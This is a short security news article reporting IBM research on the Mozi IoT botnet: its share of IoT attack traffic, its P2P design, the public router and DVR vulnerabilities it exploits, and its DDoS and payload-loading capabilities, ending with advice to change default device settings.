IBM experts discovered the Mozi botnetbased on Mirai and Gafgyt code. Researchers claim that this botnet generated 90% of all IoT traffic between October 2019 and June 2020. At the same time, the number of IoT attacks recorded over this time period was 400% higher than the total number of IoT attacks over the past two years.
The researchers note that the significant increase in IoT attacks could also be attributed to the large number of IoT devices, of which there are already approximately 31 billion worldwide. In addition, Mozi did not try to remove other competing botnets from this "market", it was simply so active that it overshadowed them.
Mozi's analysts have been watching Mozi for four years and describe it as a P2P botnet based on the Distributed Hash Table (DHT) protocol that spreads through exploits and weak passwords (via Telnet). Mozi's success is attributed to the fact that it exploits command injection and misconfigurations of IoT devices. Thus, almost all of the attacks studied began with command injection and wget, and then the malware changed permissions to facilitate interaction between hackers and the affected system.
The attackers' attacks mainly targeted the MIPS architecture: the mozi.a file was loaded and then launched on vulnerable devices.
To infect devices Mozi exploits many different vulnerabilities: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 and CVE-2018-10562 (GPON routers), CVE-2014-8361 (Realtek SDK), CVE-2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link devices), command injection into Eir D1000 wireless routers, RCE without authentication in Netgear setup.cgi, command execution in MVPower DVR, DLink UPnP SOAP command execution, and RCE bug affecting several CCTV-DVR vendors. Also, as mentioned above, for cracking, brute-force credentials through Telnet are used according to a previously prepared list.
As a result, Mozi can use infected devices to launch DDoS attacks (HTTP, TCP, UDP), command execution attacks, can download and execute additional payloads, and can also collect information about its bots.
The researchers write that they are increasingly faced with hacker attacks on corporate IoT devices and are reminded to change the default device settings.